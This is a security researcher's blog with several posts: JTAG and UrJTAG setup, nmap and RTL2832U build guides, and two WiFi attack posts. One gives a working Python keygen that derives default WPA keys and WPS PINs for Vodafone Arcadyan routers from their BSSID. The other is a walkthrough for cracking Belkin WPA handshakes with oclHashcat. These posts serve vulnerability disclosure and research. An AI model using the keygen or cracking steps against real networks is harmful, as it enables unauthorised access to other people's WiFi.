Installing UrJTAG and Altera USB blaster JTAG on Linux Ubuntu 12.04

Jueves, 5 de junio de 2014 Sin comentarios

Hey everyone, I was not writing for a while due to my little sparse time. Today I am going to talk about how to set up your box in order to debug some embedded systems by using JTAG. I will not describe it in detail because I am writing a paper talking about exactly that topic. Therefore, that paper will  explain sufficiently deep all this stuff. However, you can get working your really cheap JTAG on any Linux system following the next steps. The great feature of these JTAG is that support MIPS architecture, therefore we can extract many firmwares of the routers-modems and others  embedded devices.

JTAG is an acronym for Joint Test Action Group. It is a serial wire protocol dedicated to testing and recovering embedded hardware. It is a specialism of the synchronous four wire Serial Peripheral Interface (SPI). JTAG has a (slow) line clock (TCK), separate data in (TDI) and data out (TDO) lines, and a “test mode select” (TMS) line for controlling the state of the JTAG engine. TDI and TMS are clocked-in on the rising edge of TCK, and TDO is clocked out on its falling edge. Sometimes there is also a test reset line (TRST). [1]

To JTAG a device requires a JTAG cable. Though these days, the “cable” is usually a programmer with its own on-board logic. Chinese clones of the popular Altera USB-Blaster JTAG programmer are inexpensive, costing under 7 euros [1]

How to install your  Altera USB-blaster JTAG on Linux

First of all, we can check out which ID vendor has our Altera blaster:

$ lsusb 
Bus 001 Device 014: ID 09fb:6001 Altera 

After that, we must to add a new rule in our udev system in order to communicate our device in userland with the kernel : [2] [3]

$ sudo vim /etc/udev/rules.d/altera-usb-blaster.rules
	ATTR{idVendor}=="09fb", ATTR{idProduct}=="6001", MODE="666"

Later on,  we try to see how this change affected our system. Just extract the USB-JTAG and plug it in again.

$ sudo udevadm control --reload-rules
$ dmesg | tail
[472572.885351] usb 2-1.3: New USB device found, idVendor=09fb, idProduct=6001
[472572.885356] usb 2-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[472572.885360] usb 2-1.3: Product: USB-Blaster
[472572.885362] usb 2-1.3: Manufacturer: EPFL
[472572.885365] usb 2-1.3: SerialNumber: 00000000

Our USB-JTAG Altera blaster should be ready to play around with it.   usbblaster

How to install the Universal JTAG  on Linux

Once our device is recognized  for our box, we still need a software to use our JTAG device. Many JTAG devices  are based on the chip from “Future Technology Devices International” (FTDI) known as the FTDI FT2232. However, our Altera USB-blaster JTAG also shows up as FTDI devices, but are not protocol-compatible with the FT2232 devices. They are, however, protocol-compatible among themselves. USB-JTAG devices typically consist of a FT245 followed by a CPLD that understands a particular protocol, or emulates this protocol using some other hardware. [7] Before installing the UrJTAG (Universal JTAG library), some dependencies must be resolved:

$ sudo apt-get install libftdi-dev libusb-1.0-0 -y

We have 3 possible options to install UrJTAG.

Option 1 (subversion  #2041)

I highly recommend that option because you’ll get the last updates so far for the framework.  Actually, I did not play too much yet to verify whether it is better stable or unstable trunk.

$ svn checkout svn://svn.code.sf.net/p/urjtag/svn/trunk urjtag-svn
$ cd urjtag/jtag
$ sudo apt-get install autopoint gettext libtool -y
$ ./autogen.sh
$ ( ./configure done by autogen.sh; run it here with special options if needed )
$ make
$ make install

$ cd urjtag-svn/urjtag/src/apps/jtag
$ ./jtag
UrJTAG 0.10   2041
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

warning: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

jtag>

Option 2 ( from sourgeForge  #1502 )

Whether you definitely prefer stability due to your hardware is already properly implemented. Then you can pick this option.

$ wget http://downloads.sourceforge.net/project/urjtag/urjtag/0.10/urjtag-0.10.tar.gz
$ tar zxvf urjtag-0.10.tar.gz
$ cd urjtag-0.10
$ ./configure

jtag is now configured for

  Detected libusb      : yes
  Detected libftdi     : yes
  Detected libftd2xx   : no
  Detected inpout32    : no
  Build SVF player     : yes
  Build BSDL subsystem : yes
  Bus drivers          : au1500 avr32 bcm1250 bf526_ezkit bf527_ezkit bf533_stamp bf533_ezkit bf537_stamp bf537_ezkit bf538f_ezkit bf548_ezkit bf561_ezkit bscoach ejtag ejtag_dma fjmem ixp425 jopcyc h7202 lh7a400 mpc5200 mpc824x ppc405ep ppc440gx_ebc8 prototype pxa2x0 pxa27x s3c4510 sa1110 sh7727 sh7750r sh7751r sharc_21065L slsup3 tx4925 zefant_xs3 
  Cable drivers        : arcom byteblaster dlc5 ea253 ei012 ft2232 igloo jlink keithkoep lattice mpcbdm triton usbblaster wiggler xpc 
  Lowlevel drivers     : direct ftdi ppdev 

$ make && sudo make install

$ cd ../src/

$ ./jtag 

UrJTAG 0.10 1502
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

WARNING: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

jtag> cable Usbblaster
Connected to libftdi driver.
jtag> help
Command list:

quit          exit and terminate this session
help          display this help
frequency     setup JTAG frequency
cable         select JTAG cable
reset         reset JTAG chain
discovery     discovery of unknown parts in the JTAG chain
idcode        Read IDCODEs of all parts in a JTAG chain
detect        detect parts on the JTAG chain
signal        define new signal for a part
scan          read BSR and show changes since last scan
salias        define an alias for a signal
bit           define new BSR bit
register      define new data register for a part
initbus       initialize bus driver for active part
print         display JTAG chain list/status
part          change active part for current JTAG chain
bus           change active bus
instruction   change active instruction for a part or declare new instruction
shift         shift data/instruction registers through JTAG chain
dr            display active data register for a part
get           get external signal value
test          test external signal value
shell         shell cmmd
set           set external signal value
endian        set/print endianess
peek          read a single word
poke          write a single word
pod           Set state of POD signal(s)
readmem       read content of the memory and write it to file
writemem      write content of file to the memory
detectflash   detect parameters of flash chips attached to a part
flashmem      burn flash memory with data from a file
eraseflash    erase flash memory by number of blocks
script        run command sequence from external file
include       include command sequence from external repository
addpart       manually adds parts on the JTAG chain
usleep        Sleep some number of microseconds
svf           execute svf commands from file
bsdl          manage BSDL files
debug         debug jtag program

Type "help COMMAND" for details about a particular command.
jtag>

Option 3 ( from Ubuntu repositories)

If you are lazy or just wanna try something quickly without compiling then you can take this option.

$ apt-cache search jtag
avarice - use GDB with Atmel's JTAG ICE for the AVR
flashrom - Identify, read, write, erase, and verify BIOS/ROM/flash chips
flexloader - utility to configure SRAM based ALTERA devices
libusbprog-dev - Development files for libusbprog
libusbprog0 - Library for programming the USBprog hardware
mspdebug - debugging tool for MSP430 microcontrollers
openocd - Open on-chip JTAG debug solution for ARM and MIPS systems
openwince-jtag - allows programming jtag capable devices such as CPUs or FPGAs
urjtag - JTAG programmer for various flash parts and boards
usbprog - Firmware programming tool for the USBprog hardware
usbprog-gui - GUI firmware programming tool for the USBprog hardware

$ sudo apt-get install -y urjtag

 References

[1]   http://huaweihg612hacking.wordpress.com/2012/11/07/jtaging-the-broadcom-bcm6368-hg612/
[2]  http://www.altera.com/download/drivers/dri-usb_b-lnx.html
[3]  http://www.eecg.toronto.edu/~laforest/USB-Blaster-Debian.html
[4]  http://openocd.sourceforge.net/doc/pdf/openocd.pdf
[5]  http://sourceforge.net/p/urjtag/svn/HEAD/tree/trunk/
[6]  https://forum.openwrt.org/viewtopic.php?id=4191
[7]  http://openocd.sourceforge.net/doc/html/Debug-Adapter-Hardware.html#Debug-Adapter-Hardware

Categories: JTAGing, Linux, Reversing Tags:

Arcadyan routers used by Vodafone in Spain are also vulnerables

Martes, 4 de febrero de 2014 1 comentario

hg553-vodafoneBackground

Around 2011 some routers manufactured by the company Arcadyan were reverse engineered for the staff of seguridadwireless.net. Such research came out for an user called MrFoffly or something like that. This guy obtained an interesting log from an update of Ya.com, he used an firmware image and applied xor FF in raw mode obtaining the following logs. Many routers could be affected for the same vulnerability in the future if this company keeps using same public and patented algorithms.

 

##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3]  XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2]  XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
###%02X%02X%02X%02X%02X%02X####strWlanMacAddr:%s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d  enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1  XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!

 

After that,   some of us were a bit stuck but another user, Mambostar, achieved to figure out the algorithm in order to generate 10 possible keys by using the logs as well as the patents [Look at references] . Two years later, some German researchers reverse engineered some Easybox routers finding the same problems. Either using this algorithm or patents as well,  many routers were exposed around all Germany. One year later more or less 2013-2014, and unfortunately, this algorithm has come back to hit some Spanish routers deployed by Vodafone, actually this model ARV752DPW. However really not many of Vodafone’s routers have been affected for this vulnerability.

 

Proof-of-concept

Here you go a proof-of-concept of this vulnerability what I coded due to a small difference in the algorithm. Plenty of code has been reused for previous scripts, please take a look at credits in the code. So far the unique difference  appreciated has been the swapping between zeros by ones at the end of the key generation’s algorithm and other stuff very weird like the use of non-hexadecimal characters in the ESSID. If any zero is detected at fifth or sixth byte of the BSSID is automatically transformed into G for the ESSID.

def algorithm(mac):
    '''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
    try:
        bytes = [int(x, 16) for x in mac.split(':')]
        c1 = (bytes[-2] << 8) + bytes[-1]
        (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
        (m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
    except:
        sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")
        sys.exit()

    k1 = ( s7 + s8  + m11 + m12) & (0x0F)
    k2 = ( m9 + m10 + s9  + s10) & (0x0F)       
    x1 = k1  ^ s10
    x2 = k1  ^ s9
    x3 = k1  ^ s8
    y1 = k2  ^ m10
    y2 = k2  ^ m11
    y3 = k2  ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1  ^ k2

    wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3) 

    # Spanish modification in this algorithm
    if wpa.find("0") != -1:
        wpa = wpa.replace("0","1")

    return wpa

 

Any suggestions or feedback is always pretty much appreciated. Also bugs in the code or any enhancement.

 

$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable mac address (essid VodafoneXXXX)

required:
  -b [BSSID], --bssid [BSSID]
                        Target mac address

(+) Help: Send me bugs or new targets. Credits buckynet as usual 

$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
	 bssid: 74:31:70:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 84:9C:A6:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 88:03:55:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 1C:C6:3C:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 50:7E:5D:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 00:12:BF:xx:xx:xx 	 essid: VodafoneXXXX

$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID       : VodafoneGG11
[+] BSSID      : 74:31:70:33:00:11
[+] WPA KEY    : 58639129A
[+] WPS PIN    : 75944988

 

[+] UPDATE Android  2014-02-15

New version of wlan4xx includes this algorithm. You can find it for android devices at http://wlan4xx.blogspot.com/

wlan4xxVoda

 

[+] References:

http://foro.seguridadwireless.net/desarrollo-112/wlan4xx-algoritmo-routers-yacom/ (SPAIN)
http://www.wotan.cc/?p=6 &http://www.wardriving-forum.de/wiki/Standardpassw%C3%B6rter
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v10.txt
http://wiki.openwrt.org/toh/arcadyan/arv752dpw
http://www.securitybydefault.com/2014/01/ahora-tambien-puedes-robarle-la-wifi-de.html

[+] Patents:

http://www.patent-de.com/20081120/DE102007047320A1.html
http://www.patentstorm.us/applications/20080285498/description.html

 

Categories: Programming, Python, Reversing, Wireless Tags:

Compiling nmap 6.40 on Ubuntu 12.04.3

Sábado, 14 de diciembre de 2013 Sin comentarios

If you are using nmap from Ubuntu repositories, surely you will be using a old version without many features like scripts and other stuff. Therefore, if you want to compile from source code just follow the next steps:

wget http://nmap.org/dist/nmap-6.40.tar.bz2
tar -jxvf nmap-6.40.tar.bz2
cd nmap-6.40
./configure
make "LUA_LIBS=../liblua/liblua.a -ldl -lm"
sudo checkinstall
sudo dpkg -i nmap_6.40-1_amd64.deb

And now you can enjoy nmap:

            .       .
            \`-"'"-'/
             } 6 6 {
            ==. Y ,==
              /^^^\  .
             /     \  )  Ncat: A modern interpretation of classic Netcat
            (  )-(  )/
            -""---""---   /
           /   Ncat    \_/
          (     ____
           \_.=|____E
Configuration complete.
   (  )   /\   _                 (
    \ |  (  \ ( \.(               )                      _____
  \  \ \  `  `   ) \             (  ___                 / _   \
 (_`    \+   . x  ( .\            \/   \____-----------/ (o)   \_
- .-               \+  ;          (  O                           \____
(__                +- .( -'.- <.   \_____________  `              \  /
(_____            ._._: <_ - <- _- _  VVVVVVV VV V\                \/
  .    /./.+-  . .- /  +--  - .    (--_AAAAAAA__A_/                |
  (__ ' /x  / x _/ (                \______________//_              \_______
 , x / ( '  . / .  /                                  \___'          \     /
    /  /  _/ /    +                                       |           \   /
   '  (__/                                               /              \/
                                                       /                  \
             NMAP IS A POWERFUL TOOL -- USE CAREFULLY AND RESPONSIBLY
Configuration complete.  Type make (or gmake on some *BSD machines) to compile.

$ nmap
Nmap 6.40 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of 
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma separted list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
EXAMPLES:
  nmap -v -A scanme.nmap.org
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES
Categories: Linux, Networking Tags:

RTL2832U in Ubuntu 12.04.3 with kernel 3.8.0

Sábado, 7 de diciembre de 2013 2 comentarios

A long time ago that I couldn’t write in my humble blog, and also this time will be fast and just for remembering how to install RTL2832U drivers on Linux.  I was interested on play with SDR and Osmocon, so I ordered the cheapest Chinese DvB USB stick for around 8$ in order to play with. If we take a look at Osmocom website, we can see how this device is able to work properly.

 

How to install our RTL2832U on Ubuntu 12.04.3 LTS with kernel 3.8.0:

 

First of all, let’s connect our DvB USB stick in our box and let’s check manufacturer with:

$ lsusb  
Bus 003 Device 009: ID 0bda:2838 Realtek Semiconductor Corp.

 

 

Well, let’s see if our OS was able to load modules. Apparently not :(

$ dmesg
[25415.111665] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[25415.142742] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[25415.142748] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[25415.142751] usb 3-2: Product: RTL2838UHIDIR
[25415.142754] usb 3-2: Manufacturer: Realtek
[25415.142757] usb 3-2: SerialNumber: 00000001
[25415.234923] usbcore: registered new interface driver dvb_usb_rtl28xxu
[25415.235054] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[25415.303306] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[25415.303322] DVB: registering new adapter (Realtek RTL2832U reference design)
[25415.303637] usb 3-2: dvb_usb_rtl28xxu: unknown tuner=NONE
[25415.316812] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' error while loading driver (-19)
[25415.317674] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected

 

 

For reference, it’s a chinese one with no brand, with a rtl2832, and an E4000 tuner. Here you go the right steps in order to watch TV in your box: (Look at references for the 3.8.0 patch)

sudo apt-get install linux-headers-`uname-r`
sudo apt-get install  libproc-processtable-perl
mkdir dvb-2832u
cd dvb-2832u
git clone git://linuxtv.org/media_build.git
cd media_build
./build
cd linux/
patch -p1 < ../dvb-usb-rtl2832.patch
cd ..
make allmodconfig
make
sudo make install

 

 

 

And now we can enjoy our DvB receiver:

$ dmesg
[  150.901226] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected
[  154.491864] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[  154.522748] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[  154.522753] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  154.522756] usb 3-2: Product: RTL2838UHIDIR
[  154.522759] usb 3-2: Manufacturer: Realtek
[  154.522761] usb 3-2: SerialNumber: 00000001
[  154.528776] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[  154.598304] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[  154.598319] DVB: registering new adapter (Realtek RTL2832U reference design)
[  154.601430] usb 3-2: DVB: registering adapter 0 frontend 0 (Realtek RTL2832 (DVB-T))...
[  154.601493] r820t 0-001a: creating new instance
[  154.614036] r820t 0-001a: Rafael Micro r820t successfully identified
[  154.621529] Registered IR keymap rc-empty
[  154.621628] input: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1/input19
[  154.621712] rc1: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1
[  154.621865] input: MCE IR Keyboard/Mouse (dvb_usb_rtl28xxu) as /devices/virtual/input/input20
[  154.621935] rc rc1: lirc_dev: driver ir-lirc-codec (dvb_usb_rtl28xxu) registered at minor = 0
[  154.621937] usb 3-2: dvb_usb_v2: schedule remote query interval to 400 msecs
[  154.635023] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully initialized and connected

 

 

References:

http://www.linuxtv.org/wiki/index.php/RealTek_RTL2832U#Drivers
http://blog.xanthias.de/2013/06/04/cinergy-tstick-rc-dvb-rev-3-00d3-realtek-2832-unter-ubuntu/
Patch : http://forum.stmlabs.com/showthread.php?pid=46468

Categories: Linux Tags:

CrackWPA I : Breaking Belkin WPA passphrases by bruteforce (oclHashcat)

Lunes, 29 de julio de 2013 Sin comentarios

keyfound

UPDATED!  Due to release of the new algorithm this method is pointless. Take a look at my P0C: https://bitbucket.org/dudux/belkin4xx.

Some months ago I wrote about WPS pins by default (CVE-2012-6371)  in some Belkin routers after reading another interesting post of how bruteforce a wifi network with essids like this : belkin.XXXX (CVE-2012-4366). The researchers afirmed that they found out how to generate default  WPA keys using the mac address using substitution tables. Surely if you have several data then you can figure it out. Otherwise it would be pretty interesting to look for in the firmwares. By the way, in this post I am gonna crack a handshake EAPOL+WPA using oclHashcat-plus and maskprocessor.

Meanwhile I am trying to figure out how to generate those passphrases, we can demonstrate how those used passphrases  are very weak if we use two GPUs like hd7970 .

If you are attempting that at home, you’ll need the next:

  • As many GPUs you can get (at least one is enough)
  • oclHashcat-plus correctly installed in your machine
  • Suite aircrack-ng
  • Maskprocessor ( Also of the Hashcat team)
  • A right handshake of any Belkin wifi network

First of all, we gotta achieve a right handshake with CAP format. The best way is using aircrack-ng, although you can also try it via online using this link: https://hashcat.net/cap2hccap/. When we got  the handshake then if we want to use oclHashcat, we should convert from .cap to .hccap ( Special cap for working with hashcat. Please take a look below for further information)

$ aircrack-ng  9944XXYY35A1_belkin-43a2.cap -J belkin
Opening 9944XXYY35A1_belkin-43a2.cap
Read 12517 packets.

   #  BSSID              ESSID                     Encryption

   1  94:44:XX:YY:35:A1  belkin.43a2               EAPOL+WPA (1 handshake)

Choosing first network as target.

Opening 9944XXYY35A1_belkin-43a2.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 11): belkin.43a2
[*] Key version: 2
[*] BSSID: 94:44:XX:YY:35:A1
[*] STA: ZZ:WW:71:3D:B9:7A
[*] anonce:
    4A 9B 2F C4 33 6C 35 33 76 83 50 6C F7 17 57 20 
    B4 0C 7A F7 26 E9 5D 6D F2 97 AA 75 3E AE 7F A9 
[*] snonce:
    05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 97 
    1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 56 
[*] Key MIC:
    6C 33 F8 97 EA 50 E1 DB 16 5B C9 EC 95 7A 99 C7
[*] eapol:
    01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00 
    00 05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 
    97 1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 
    56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC 
    04 01 00 00 0F AC 02 00 00 

Successfully written to belkin.hccap

Quitting aircrack-ng...

 

hccap specs

Specs at WPA files using hashcat

Secondly, we can use several ways with oclHashcat in order to try crack these networks:

  1. Input STDIN piping with maskprocessor. (Advantage: on-the-fly, no space in HDD is required.  Disadvantage: We cannot watch time,temperature and so on)
  2. Dictionary attack creating a wordlist with maskprocessor previously. ( Advantage: We can watch temperature,time and so on. Disadvantage:  some GB of your HDD)
  3. Bruteforce with -a 3     (Advantage: on-the-fly ,no hardisk, no pipes)    (Thanks philsmd of Hashcat’s IRC for that notation)

I have chose the second one, because I like watching, and the most important can pause the process when I need it. Anyway the speed is exactly the same.

After installing maskprocessor we are able to get the right number of combinations if we know the mask of the attack. We know that Belkin is using WPA passphrases of  lenght: 8 digits with charset: lowercase hexadecimal (0.9a.f). In this moment we can quickly calculate the possible combinations

$ ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 --combinations
4294967296

To save the wordlist we simply redirect the output in a file:

$ time ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 > ../../../wordlist/WPA/belkin.txt

real    14m15.701s
user    1m25.245s
sys      1m9.252s

$ ls -lah belkin.txt

-rwxrwxrwx 1 root root 36G Jul 29 00:20 belkin.txt

In order to crack the handshake using our wordlist and  oclHashcat , we can use the next command:

CrackWPAbelkin

 $ ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024  /tocrack/belkin.hccap /wordlist/WPA/belkin.txt 

Generating dictionary stats for /wordlist/WPA/belkin.txt: 1399569552 bytes (3.62%), 155507728 words, 15550772
Generating dictionary stats for /wordlist/WPA/belkin.txt: 1910789568 bytes (4.94%), 212309952 words, 21230995
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2012405022 bytes (5.21%), 223600558 words, 22360055
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2114020476 bytes (5.47%), 234891164 words, 23489116
